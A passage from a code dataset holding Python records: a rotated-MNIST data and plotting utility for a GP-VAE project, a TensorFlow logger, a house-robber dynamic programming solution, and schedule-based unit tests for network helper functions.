Then accepts extra rows to be added\r\n and occasionally written to disc.\r\n \"\"\"\r\n def __init__(self, res_file, colnames):\r\n # reload old results frame\r\n if os.path.exists(res_file):\r\n if list(pd.read_pickle(res_file).columns)==colnames:\r\n print(\"res_file: recovered \")\r\n self.data = pd.read_pickle(res_file)\r\n self.res_file = res_file\r\n else:\r\n print(\"res_file: old exists but not same, making new \")\r\n self.res_file = res_file + \"_\" + str(time.time())\r\n self.data = pd.DataFrame(columns=colnames)\r\n else:\r\n print(\"res_file: new\")\r\n self.res_file = res_file\r\n self.data = pd.DataFrame(columns=colnames)\r\n \r\n self.ncols = len(colnames)\r\n self.colnames = colnames\r\n \r\n def __call__(self, new_data, n_steps=10):\r\n new_data = np.asarray(new_data).reshape((-1, self.ncols))\r\n new_data = pd.DataFrame(new_data, columns=self.colnames)\r\n self.data = pd.concat([self.data, new_data])\r\n\r\n if self.data.shape[0]%n_steps == 0:\r\n self.data.to_pickle(self.res_file)\r\n print(\"Saved results to file: \"+self.res_file)\r\n\r\n\r\ndef gauss_cross_entropy(mu1, var1, mu2, var2):\r\n \"\"\"\r\n Computes the element-wise cross entropy\r\n Given q(z) ~ N(z| mu1, var1)\r\n returns E_q[ log N(z| mu2, var2) ]\r\n args:\r\n mu1: mean of expectation (batch, tmax, 2) tf variable\r\n var1: var of expectation (batch, tmax, 2) tf variable\r\n mu2: mean of integrand (batch, tmax, 2) tf variable\r\n var2: var of integrand (batch, tmax, 2) tf variable\r\n returns:\r\n cross_entropy: (batch, tmax, 2) tf variable\r\n \"\"\"\r\n\r\n term0 = 1.8378770664093453 # log(2*pi)\r\n term1 = tf.log(var2)\r\n term2 = (var1 + mu1 ** 2 - 2 * mu1 * mu2 + mu2 ** 2) / var2\r\n\r\n cross_entropy = -0.5 * (term0 + term1 + term2)\r\n\r\n return cross_entropy\r\n \r\n\r\ndef generate_rotated_MNIST(save_path, N=400, nr_angles=16, valid_set_size=0.1, drop_rate=0.25, digits=[3, 6],\r\n latent_dim_object_vector=8, shuffle_data=True, seed=0):\r\n \"\"\"\r\n Generate rotated MNIST data from Casale's paper.\r\n\r\n Saves train, validation and test sets as pickle files.\r\n Each dataset is a Pyhton dictionary with keys: ['images', 'auxiliary data'].\r\n Auxiliary data consists of image id, rotation angle and PCA embedding vector.\r\n\r\n :param save_path: path for saving the generated data\r\n :param N: number of MNIST images of specified digits to use\r\n :param nr_angles: number of angles between [0, 2pi) considered\r\n :param valid_set_size: size of validation set\r\n :param drop_rate: how much images to drop\r\n :param digit: which digit to consider\r\n :param shuffle_data: whether or not to shuffle data. 
Might be important since if we pass\r\n all angles of the same digit in same batch, kernel matrices carry more information that model could exploit.\r\n Note that for Michael's extrapolatingGPVAE idea, data should not be shuffled, since there independent GPs are\r\n fitted for each image.\r\n :param latent_dim_object_vector: dimension of latent dimension of object vectors\r\n :param seed: random seed, for reproducibility\r\n \"\"\"\r\n\r\n random.seed(seed)\r\n angles = np.linspace(0, 360, nr_angles + 1)[:-1]\r\n\r\n # load MNIST data\r\n (x_train, y_train), (_, _) = tf.keras.datasets.mnist.load_data()\r\n\r\n # Rescale the images from [0,255] to the [0.0,1.0] range.\r\n x_train = x_train[..., np.newaxis] / 255.0\r\n\r\n # TODO: should MNIST images be binarized here?\r\n\r\n # filter out images with correct digit\r\n digits_df = []\r\n for digit in digits:\r\n x_train_digit = x_train[(y_train == digit)]\r\n print('Number of images with digit {}: {}'.format(digit, len(x_train_digit)))\r\n\r\n # subsample N images\r\n indices = random.sample(list(range(x_train_digit.shape[0])), N)\r\n digits_df.append(x_train_digit[indices, :, :, 0]) # (N, 28, 28)\r\n\r\n x_train = np.concatenate(digits_df)\r\n\r\n # PCA\r\n pca_df = x_train.copy().reshape((x_train.shape[0], -1))\r\n pca = PCA(n_components=latent_dim_object_vector)\r\n pca_df = pca.fit_transform(pca_df)\r\n print(\"Explained variance ratio PCA: {}\".format(pca.explained_variance_ratio_))\r\n\r\n # save pca_df to pickle (for init of object vectors)\r\n digit_ending = \"\".join([str(x) for x in digits])\r\n with open(save_path + 'pca_ov_init{}_{}.p'.format(digit_ending, latent_dim_object_vector), 'wb') as ov_init_pickle:\r\n pickle.dump(pca_df, ov_init_pickle)\r\n\r\n # rotate images\r\n def rotate_image(image, image_id, angles, pca_embedding):\r\n images = []\r\n\r\n aux_data = np.array([tuple([image_id, math.radians(angle)] + list(pca_embedding)) for angle in angles])\r\n\r\n for i in range(len(angles)):\r\n images.append(ndimage.rotate(image, angles[i], reshape=False))\r\n\r\n images = np.stack(images)\r\n images = images[..., np.newaxis]\r\n\r\n return images, aux_data\r\n\r\n images, aux_data = [], []\r\n\r\n assert len(digits) * N == x_train.shape[0]\r\n for i in range(len(digits) * N):\r\n images_rot, aux_data_i = rotate_image(x_train[i, :, :], i, angles, pca_df[i, :].copy())\r\n images.append(images_rot)\r\n aux_data.append(aux_data_i)\r\n\r\n images = np.concatenate(images) # (N * len(angles), 28, 28, 1)\r\n aux_data = np.concatenate(aux_data) # (N * len(angles), 10)\r\n\r\n # train/test and eval split\r\n images_, aux_data_, eval_images_, eval_aux_data_ = [], [], [], []\r\n N_digit = int(len(images) / len(digits))\r\n N_eval = int(N_digit * (1 - valid_set_size))\r\n for i in range(len(digits)):\r\n images_.append(images[i * N_digit:i * N_digit + N_eval])\r\n aux_data_.append(aux_data[i * N_digit:i * N_digit + N_eval])\r\n eval_images_.append(images[i * N_digit + N_eval:(i + 1) * N_digit])\r\n eval_aux_data_.append(aux_data[i * N_digit + N_eval:(i + 1) * N_digit])\r\n\r\n images, aux_data, eval_images, eval_aux_data = np.concatenate(images_), np.concatenate(aux_data_), \\\r\n np.concatenate(eval_images_), np.concatenate(eval_aux_data_)\r\n\r\n # shuffle eval data\r\n if shuffle_data:\r\n eval_idx = random.sample(list(range(len(eval_images))), len(eval_images))\r\n eval_images, eval_aux_data = eval_images[eval_idx], eval_aux_data[eval_idx]\r\n\r\n # train and test split\r\n test_angle = random.sample(list(angles), 1)[0]\r\n mask = 
(aux_data[:, 1] == math.radians(test_angle))\r\n train_images, train_aux_data, test_images, test_aux_data = images[~mask], aux_data[~mask], \\\r\n images[mask], aux_data[mask]\r\n print(\"Test angle: {}\".format(test_angle))\r\n\r\n # drop some images\r\n if shuffle_data:\r\n idx_train = random.sample(list(range(len(train_images))), int(len(train_images) * (1 - drop_rate)))\r\n idx_test = random.sample(list(range(len(test_images))), int(len(test_images) * (1 - drop_rate)))\r\n else:\r\n idx_train = list(range(int(len(train_images) * (1 - drop_rate))))\r\n idx_test = list(range(int(len(test_images) * (1 - drop_rate))))\r\n\r\n idx_train_not_in_test = list(range(int(len(train_images) * (1 - drop_rate)), len(train_images)))\r\n train_not_in_test_images = train_images[idx_train_not_in_test]\r\n train_not_in_test_aux_data = train_aux_data[idx_train_not_in_test]\r\n\r\n train_images, train_aux_data = train_images[idx_train], train_aux_data[idx_train]\r\n test_images, test_aux_data = test_images[idx_test], test_aux_data[idx_test]\r\n\r\n print('Size of training data: {}'.format(len(train_images)))\r\n print('Size of validation data: {}'.format(len(eval_images)))\r\n print('Size of test data: {}'.format(len(test_images)))\r\n\r\n if not shuffle_data:\r\n print('Size of training data without test ids: {}'.format(len(train_not_in_test_images)))\r\n\r\n # save to pickle files\r\n train_dict = {'images': train_images, 'aux_data': train_aux_data}\r\n eval_dict = {'images': eval_images, 'aux_data': eval_aux_data}\r\n test_dict = {'images': test_images, 'aux_data': test_aux_data}\r\n\r\n if not shuffle_data:\r\n train_not_in_test_dict = {'images': train_not_in_test_images, 'aux_data': train_not_in_test_aux_data}\r\n\r\n ending = \"_not_shuffled_{}.p\".format(latent_dim_object_vector) if not shuffle_data else \"_{}.p\".format(latent_dim_object_vector)\r\n ending = digit_ending + ending\r\n print(ending)\r\n\r\n with open(save_path + 'train_data' + ending, 'wb') as train_pickle:\r\n pickle.dump(train_dict, train_pickle)\r\n with open(save_path + 'eval_data' + ending, 'wb') as eval_pickle:\r\n pickle.dump(eval_dict, eval_pickle)\r\n with open(save_path + 'test_data' + ending, 'wb') as test_pickle:\r\n pickle.dump(test_dict, test_pickle)\r\n\r\n if not shuffle_data:\r\n with open(save_path + 'train_not_in_test_data' + ending, 'wb') as train_pickle:\r\n pickle.dump(train_not_in_test_dict, train_pickle)\r\n\r\n\r\ndef plot_mnist(arr, recon_arr, title, nr_images=8, seed=0):\r\n \"\"\"\r\n\r\n :param arr:\r\n :param recon_arr:\r\n :param title:\r\n :param nr_images:\r\n :param seed:\r\n :return:\r\n \"\"\"\r\n random.seed(seed)\r\n assert nr_images % 8 == 0\r\n\r\n indices = random.sample(list(range(len(arr))), nr_images)\r\n plt.figure(figsize=(10, 10*int(nr_images/8)))\r\n plt.suptitle(title)\r\n for i in range(int(nr_images*2)):\r\n plt.subplot(int(nr_images / 2), 4, i + 1)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.grid(False)\r\n if i % 2 == 0:\r\n plt.imshow(arr[indices[i // 2]][:, :, 0], cmap='gray')\r\n plt.xlabel(\"Ground truth, id: {}\".format(indices[i // 2]))\r\n else:\r\n plt.imshow(recon_arr[indices[i // 2]][:, :, 0], cmap='gray')\r\n plt.xlabel(\"Recon image, id: {}\".format(indices[i // 2]))\r\n # plt.tight_layout()\r\n plt.draw()\r\n\r\n\r\ndef visualize_kernel_matrices(aux_data_arr, batch_size=32, N=1, K_obj_normalized=True,\r\n amplitude=1.0, length_scale=1.0):\r\n \"\"\"\r\n Visualize heatmaps of kernel matrices.\r\n\r\n :param aux_data_arr:\r\n :param batch_size:\r\n :param N: number of 
batches to visualize\r\n :param K_obj_normalized: whether or not to normalize (between -1 and 1) object kernel matrix (linear kernel)\r\n :param amplitude:\r\n :param length_scale:\r\n \"\"\"\r\n\r\n # define kernels\r\n kernel_view = tfk.ExpSinSquared(amplitude=amplitude, length_scale=length_scale, period=2 * np.pi)\r\n kernel_object = tfk.Linear()\r\n x = tf.placeholder(dtype=tf.float32)\r\n y = tf.placeholder(dtype=tf.float32)\r\n z = tf.placeholder(dtype=tf.float32)\r\n w = tf.placeholder(dtype=tf.float32)\r\n K_view = kernel_view.matrix(tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=1))\r\n K_obj = kernel_object.matrix(z, w)\r\n if K_obj_normalized:\r\n obj_norm = 1 / tf.matmul(tf.math.reduce_euclidean_norm(z, axis=1, keepdims=True),\r\n tf.transpose(tf.math.reduce_euclidean_norm(z, axis=1, keepdims=True), perm=[1, 0]))\r\n K_obj = K_obj * obj_norm\r\n K_prod = K_view * K_obj\r\n\r\n # util function for heatmaps\r\n def heatmap(ax_, arr, title, vmin=0, vmax=1):\r\n ax = sns.heatmap(arr, vmin=vmin, vmax=vmax, center=0,\r\n cmap=sns.diverging_palette(20, 220, n=200),\r\n square=True, ax=ax_)\r\n ax.set_xticklabels(ax.get_xticklabels(),\r\n rotation=45,\r\n horizontalalignment='right')\r\n ax.set_title(title);\r\n\r\n for i in range(N):\r\n # generate kernel matrices\r\n batch = aux_data_arr[i * batch_size:(i + 1) * batch_size]\r\n with tf.Session() as sess:\r\n K_view_, K_obj_, K_prod_ = sess.run([K_view, K_obj, K_prod],\r\n {x: batch[:, 1], y: batch[:, 1], z: batch[:, 2:], w: batch[:, 2:]})\r\n # plot kernel matrices\r\n fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(20, 5))\r\n heatmap(axes[0], K_view_, \"View kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_view_)))\r\n heatmap(axes[1], K_obj_, \"Object kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_obj_)), vmin=-1)\r\n heatmap(axes[2], K_prod_, \"Product kernel. Batch: {}. Det: {}\".format(i + 1, np.linalg.det(K_prod_)), vmin=-1)\r\n plt.show()\r\n\r\n\r\ndef import_rotated_mnist(MNIST_path, ending, batch_size, digits=\"3\", N_t=None):\r\n \"\"\"\r\n\r\n Support for loading of data and batching via tf.data.Dataset API.\r\n\r\n :param MNIST_path:\r\n :param ending:\r\n :param batch_size:\r\n :param N_t: How many angels in train set for each image in test set\r\n (since reGPVAE implementation is based on not_shuffled data).\r\n\r\n :return:\r\n \"\"\"\r\n\r\n # TODO: here we load entire data in the memory. 
For MNIST that is fine, for larger datasets will have to\r\n # implement it in more efficient way\r\n\r\n # train data\r\n train_data_dict = pickle.load(open(MNIST_path + 'train_data' + ending, 'rb'))\r\n if N_t is not None:\r\n flatten = lambda l: [item for sublist in l for item in sublist]\r\n digit_mask = [True] * N_t + [False] * (15 - N_t)\r\n\r\n mask = [random.sample(digit_mask, len(digit_mask)) for _ in range(int(len(train_data_dict['aux_data'])/15))]\r\n mask = flatten(mask)\r\n train_data_dict['images'] = train_data_dict['images'][mask]\r\n train_data_dict['aux_data'] = train_data_dict['aux_data'][mask]\r\n\r\n # add train images without test angles\r\n if N_t < 15:\r\n train_not_in_test_data_dict = pickle.load(open(MNIST_path + 'train_not_in_test_data' + ending, 'rb'))\r\n\r\n n = int(len(digits) * 270 * (15 - N_t) / N_t) * N_t\r\n\r\n mask = [random.sample(digit_mask, len(digit_mask)) for _ in range(int(len(train_not_in_test_data_dict['aux_data']) / 15))]\r\n mask = flatten(mask)\r\n\r\n train_data_dict['images'] = np.concatenate((train_data_dict['images'],\r\n train_not_in_test_data_dict['images'][mask][:n, ]), axis=0)\r\n train_data_dict['aux_data'] = np.concatenate((train_data_dict['aux_data'],\r\n train_not_in_test_data_dict['aux_data'][mask][:n, ]), axis=0)\r\n\r\n train_data_images = tf.data.Dataset.from_tensor_slices(train_data_dict['images'])\r\n train_data_aux_data = tf.data.Dataset.from_tensor_slices(train_data_dict['aux_data'])\r\n train_data = tf.data.Dataset.zip((train_data_images, train_data_aux_data)).batch(batch_size)\r\n\r\n # eval data\r\n eval_batch_size_placeholder = tf.compat.v1.placeholder(dtype=tf.int64, shape=())\r\n eval_data_dict = pickle.load(open(MNIST_path + 'eval_data' + ending, 'rb'))\r\n eval_data_images = tf.data.Dataset.from_tensor_slices(eval_data_dict['images'])\r\n eval_data_aux_data = tf.data.Dataset.from_tensor_slices(eval_data_dict['aux_data'])\r\n eval_data = tf.data.Dataset.zip((eval_data_images, eval_data_aux_data)).batch(eval_batch_size_placeholder)\r\n\r\n # test data\r\n test_batch_size_placeholder = tf.compat.v1.placeholder(dtype=tf.int64, shape=())\r\n test_data_dict = pickle.load(open(MNIST_path + 'test_data' + ending, 'rb'))\r\n test_data_images = tf.data.Dataset.from_tensor_slices(test_data_dict['images'])\r\n test_data_aux_data = tf.data.Dataset.from_tensor_slices(test_data_dict['aux_data'])\r\n test_data = tf.data.Dataset.zip((test_data_images, test_data_aux_data)).batch(test_batch_size_placeholder)\r\n\r\n # init iterator\r\n iterator = tf.data.Iterator.from_structure(train_data.output_types, train_data.output_shapes)\r\n training_init_op = iterator.make_initializer(train_data)\r\n eval_init_op = iterator.make_initializer(eval_data)\r\n test_init_op = iterator.make_initializer(test_data)\r\n\r\n return iterator, training_init_op, eval_init_op, test_init_op, \\\r\n train_data_dict, eval_data_dict, test_data_dict, eval_batch_size_placeholder, test_batch_size_placeholder\r\n\r\n\r\ndef print_trainable_vars(vars):\r\n total_parameters = 0\r\n print(\"\\n\\nTrainable variables:\")\r\n for v in vars:\r\n print(v)\r\n shape = v.get_shape()\r\n var_params = 1\r\n for dim in shape:\r\n var_params *= dim.value\r\n total_parameters += var_params\r\n print(\"Number of train params: {}\".format(total_parameters))\r\n\r\n\r\ndef latent_samples_VAE_full_train(train_images, vae, clipping_qs=False):\r\n \"\"\"\r\n Get latent samples for training data. 
For t-SNE plots :)\r\n\r\n :param train_images:\r\n :param vae:\r\n :param clipping_qs:\r\n :return:\r\n \"\"\"\r\n\r\n # ENCODER NETWORK\r\n qnet_mu, qnet_var = vae.encode(train_images)\r\n\r\n # clipping of VAE posterior variance\r\n if clipping_qs:\r\n qnet_var = tf.clip_by_value(qnet_var, 1e-3, 10)\r\n\r\n # SAMPLE\r\n epsilon = tf.random.normal(shape=tf.shape(qnet_mu), dtype=vae.dtype)\r\n latent_samples = qnet_mu + epsilon * tf.sqrt(qnet_var)\r\n\r\n return latent_samples\r\n\r\n\r\nif __name__==\"__main__\":\r\n\r\n # generate_init_inducing_points(\"MNIST data/train_data3.p\", PCA=False)\r\n\r\n # ============= generating rotated MNIST data =============\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3, 6])\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[1, 3, 6, 7, 9])\r\n # generate_rotated_MNIST(\"MNIST data/\")\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[6])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[3])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[3, 6])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[1, 3, 6, 7, 9])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=True, digits=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n # generate_rotated_MNIST('MNIST data/', shuffle_data=False, digits=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=4)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=16)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=32)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=64)\r\n generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=24)\r\n\r\n","repo_name":"metodj/FGP-VAE","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":20978,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
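Note on the utils.py record above: gauss_cross_entropy is the closed form E_{z~N(mu1,var1)}[log N(z|mu2,var2)] = -0.5*(log(2*pi) + log(var2) + (var1 + (mu1 - mu2)^2)/var2). The NumPy sketch below checks that formula against a Monte Carlo estimate; the test values are arbitrary.

# NumPy check of the closed-form Gaussian cross entropy used above.
import numpy as np

def gauss_cross_entropy(mu1, var1, mu2, var2):
    return -0.5 * (np.log(2 * np.pi) + np.log(var2)
                   + (var1 + (mu1 - mu2) ** 2) / var2)

mu1, var1, mu2, var2 = 0.3, 0.5, -1.0, 2.0
closed = gauss_cross_entropy(mu1, var1, mu2, var2)

# Monte Carlo estimate: draw z ~ N(mu1, var1) and average log N(z | mu2, var2)
rng = np.random.default_rng(0)
z = rng.normal(mu1, np.sqrt(var1), 200_000)
mc = np.mean(-0.5 * (np.log(2 * np.pi * var2) + (z - mu2) ** 2 / var2))
print(closed, mc)  # the two estimates should agree to roughly 2-3 decimals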
+{"seq_id":"13723476356","text":"import tensorflow as tf\nimport numpy as np\nimport io\nimport PIL.Image\n\n\nclass Logger(object):\n def __init__(self, log_dir):\n self.writer = tf.summary.create_file_writer(log_dir)\n\n def scalar_summary(self, tag, value, step):\n with self.writer.as_default():\n tf.summary.scalar(tag, value, step=step)\n\n def image_summary(self, tag, images, step):\n with self.writer.as_default():\n image_summaries = []\n for i, img in enumerate(images):\n # Convert image to PIL Image object\n pil_img = PIL.Image.fromarray(img)\n\n # Create a BytesIO object to store the image data\n image_buffer = io.BytesIO()\n pil_img.save(image_buffer, format='PNG')\n\n # Create an Image Tensor\n img_tensor = tf.image.decode_image(image_buffer.getvalue(), channels=4)\n\n # Add image summary\n image_summaries.append(tf.summary.image(f'{tag}/{i}', [img_tensor], step=step))\n\n tf.summary.experimental.write_raw_pb(tf.summary.experimental.serialize_many_summary(image_summaries), step=step)\n\n def histo_summary(self, tag, values, step, bins=1000):\n with self.writer.as_default():\n tf.summary.histogram(tag, values, step=step, buckets=bins)","repo_name":"AbhishekKaushikCV/SEGMENT3D","sub_path":"train/common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21308396624","text":"class Solution:\n def rob(self, nums: List[int]) -> int:\n if len(nums) <= 3:\n return max(nums)\n \n def houseRobbed(index, bound):\n if index > bound:\n return 0\n \n if index in memo:\n return memo[index]\n \n memo[(index)] = max(nums[index] + houseRobbed(index + 2, bound), houseRobbed( index + 1, bound))\n return memo[(index)]\n \n memo = {}\n FirstHouseRobbed = houseRobbed(0, len(nums) - 2)\n \n memo.clear()\n LastHouseRobbed = houseRobbed(1, len(nums) - 1)\n \n return max(FirstHouseRobbed, LastHouseRobbed)\n ","repo_name":"YeabAM/A2SV","sub_path":"0213-house-robber-ii/0213-house-robber-ii.py","file_name":"0213-house-robber-ii.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"29093498821","text":"\"\"\"Unit tests for sched_funcs.py decorators\"\"\"\n\nimport os\nimport sys\nimport time\nimport datetime\nimport logging\nimport functools\nimport unittest\n\nimport mock\nimport pytest\nimport schedule\nfrom schedule import every\n\nfrom node_tools.helper_funcs import NODE_SETTINGS\nfrom node_tools.helper_funcs import AttrDict\nfrom node_tools.helper_funcs import send_announce_msg\nfrom node_tools.network_funcs import echo_client\nfrom node_tools.network_funcs import get_net_cmds\nfrom node_tools.network_funcs import run_net_cmd\nfrom node_tools.network_funcs import send_wedged_msg\nfrom node_tools.sched_funcs import catch_exceptions\nfrom node_tools.sched_funcs import run_until_success\nfrom node_tools.sched_funcs import show_job_tags\n\ntry:\n from datetime import timezone\n utc = timezone.utc\nexcept ImportError:\n from schedule.timezone import UTC\n utc = UTC()\n\n\ndef make_mock_job(name=None):\n job = mock.Mock()\n job.__name__ = name or 'job'\n return job\n\n\nclass mock_datetime(object):\n \"\"\"\n Monkey-patch datetime for predictable results\n \"\"\"\n def __init__(self, year, month, day, hour, minute, second=0):\n self.year = year\n self.month = month\n self.day = day\n self.hour = hour\n self.minute = minute\n self.second = second\n\n def __enter__(self):\n class MockDate(datetime.datetime):\n @classmethod\n def today(cls):\n return cls(self.year, self.month, self.day)\n\n @classmethod\n def now(cls, tz=None):\n return cls(self.year, self.month, self.day,\n self.hour, self.minute, self.second).replace(tzinfo=tz)\n\n self.original_datetime = datetime.datetime\n datetime.datetime = MockDate\n\n def __exit__(self, *args, **kwargs):\n datetime.datetime = self.original_datetime\n\n\nclass ScheduleTests(unittest.TestCase):\n def setUp(self):\n self.bin_dir = os.path.join(os.getcwd(), 'test/fpnd/')\n schedule.clear()\n\n def test_job_info(self):\n with mock_datetime(2010, 1, 6, 14, 16):\n mock_job = make_mock_job(name='info_job')\n info_job = every().minute.do(mock_job, 1, 7, 'three')\n schedule.run_all()\n assert len(schedule.jobs) == 1\n assert schedule.jobs[0] == info_job\n assert repr(info_job)\n assert info_job.job_name is not None\n s = info_job.info\n assert 'info_job' in s\n assert 'three' in s\n assert '2010' in s\n assert '14:16' in s\n\n def test_cancel_job(self):\n @show_job_tags()\n def stop_job():\n return schedule.CancelJob\n mock_job = make_mock_job()\n\n every().second.do(stop_job)\n mj = every().second.do(mock_job)\n assert len(schedule.jobs) == 2\n\n schedule.run_all()\n assert len(schedule.jobs) == 1\n assert schedule.jobs[0] == mj\n\n schedule.cancel_job('Not a job')\n assert len(schedule.jobs) == 1\n schedule.default_scheduler.cancel_job('Not a job')\n assert len(schedule.jobs) == 1\n\n schedule.cancel_job(mj)\n assert len(schedule.jobs) == 0\n\n def test_run_net_cmd_sup(self):\n cmd_up0 = get_net_cmds(self.bin_dir, 'fpn0', True)\n cmd_up1 = get_net_cmds(self.bin_dir, 'fpn1', True)\n\n every().second.do(run_net_cmd, cmd_up0).tag('net-change')\n every().second.do(run_net_cmd, cmd_up1).tag('net-change')\n\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 0)\n\n def test_run_net_cmd_sdown(self):\n NODE_SETTINGS['route_dns_53'] = True\n NODE_SETTINGS['private_dns_only'] = True\n\n cmd_down0 = get_net_cmds(self.bin_dir, 'fpn0', False)\n cmd_down1 = get_net_cmds(self.bin_dir, 'fpn1', False)\n\n every().second.do(run_net_cmd, cmd_down0).tag('net-change')\n 
every().second.do(run_net_cmd, cmd_down1).tag('net-change')\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 0)\n\n\nclass SendMsgTest(unittest.TestCase):\n \"\"\"\n Note the input for this test case is just nodeState.fpn_id and\n mainly tests the warning generated by the nanomsg timeout.\n \"\"\"\n def setUp(self):\n super(SendMsgTest, self).setUp()\n from node_tools import state_data as st\n\n schedule.clear()\n self.default_state = st.defState\n self.state = st.fpnState\n self.cfg = st.cfg_msgs\n self.addr = '127.0.0.1'\n\n def tearDown(self):\n from node_tools import state_data as st\n\n # defState = s.defState\n\n st.fpnState = self.default_state\n super(SendMsgTest, self).tearDown()\n\n def test_send_echo_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n # expected command result is a list so the return\n # result for echo_client() is actually None\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_announce_msg(fpn_id, None)\n schedule.run_all()\n\n with self.assertWarns(RuntimeWarning) as err:\n result = echo_client(fpn_id, self.addr)\n # print(result)\n self.assertIs(result, None)\n\n def test_send_cfg_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n # expected command result is a list so the return\n # result for echo_client() is actually None\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_announce_msg(fpn_id, None, send_cfg=True)\n schedule.run_all()\n\n with self.assertWarns(RuntimeWarning) as err:\n result = echo_client(fpn_id, self.addr, send_cfg=True)\n # print(result)\n self.assertIs(result, None)\n\n def test_send_wedged_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_wedged_msg()\n schedule.run_all()\n\n # expected command result is a list\n result = send_wedged_msg(self.addr)\n # print(result)\n self.assertEqual([], result)\n\n\nclass NetCmdTests(unittest.TestCase):\n \"\"\"\n Slightly better tests (than NetCmdTest) using schedule.\n \"\"\"\n def setUp(self):\n self.bin_dir = os.path.join(os.getcwd(), 'test/fpnd/')\n schedule.clear()\n\n def test_run_net_cmd_false(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n cmd = ['/bin/false']\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertEqual(res, b'')\n\n def test_get_net_cmds_bad_path(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n bad_dir = '/tmp/foobar/'\n cmd = ['/tmp/foo0-down.sh']\n self.assertFalse(os.path.isdir(bad_dir))\n res = get_net_cmds(bad_dir, 'fpn0', True)\n # print(cmd)\n self.assertIsNone(res)\n state, result, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertRaises(FileNotFoundError)\n # print(result)\n\n def test_run_net_cmd_not_found(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n cmd = ['/bin/tuna']\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertRaises(FileNotFoundError)\n\n def test_run_net_cmd_up0(self):\n # expected command result is 'Success' so the return\n # result is actually \n mock_job = make_mock_job()\n cmd = get_net_cmds(self.bin_dir, 'fpn0', True)\n tj = every().second.do(mock_job)\n\n result 
= run_net_cmd(cmd)\n self.assertIsInstance(result, type)\n self.assertIn('CancelJob', str(result))\n\n def test_run_net_cmd_down0(self):\n # expected command result is 'Fail' so the return\n # result is the output of run_net_cmd()\n mock_job = make_mock_job()\n cmd = get_net_cmds(self.bin_dir, 'fpn0', False)\n tj = every().second.do(mock_job)\n\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertEqual(res, b'')\n self.assertEqual(ret, 1)\n","repo_name":"freepn/fpnd","sub_path":"test/test_sched_decorators.py","file_name":"test_sched_decorators.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":293,"dataset":"github-code","pt":"16"}
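Note on the test_sched_decorators.py record above: it drives the third-party schedule package through every().second.do(...), run_all() and CancelJob (the two-argument run_all(0, 'net-change') form comes from the project's own fork). A minimal usage sketch of the upstream pattern, assuming the schedule package is installed; the job names are made up.

# Minimal `schedule` usage sketch: a job returning schedule.CancelJob removes
# itself after one run.
import schedule
from schedule import every

def run_once():
    print("ran once")
    return schedule.CancelJob

def keep_running():
    print("still scheduled")

every().second.do(run_once)
every().second.do(keep_running)
print(len(schedule.jobs))              # 2
schedule.run_all(delay_seconds=0)      # run every job now, ignoring its interval
print(len(schedule.jobs))              # 1 - run_once cancelled itself
schedule.clear()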
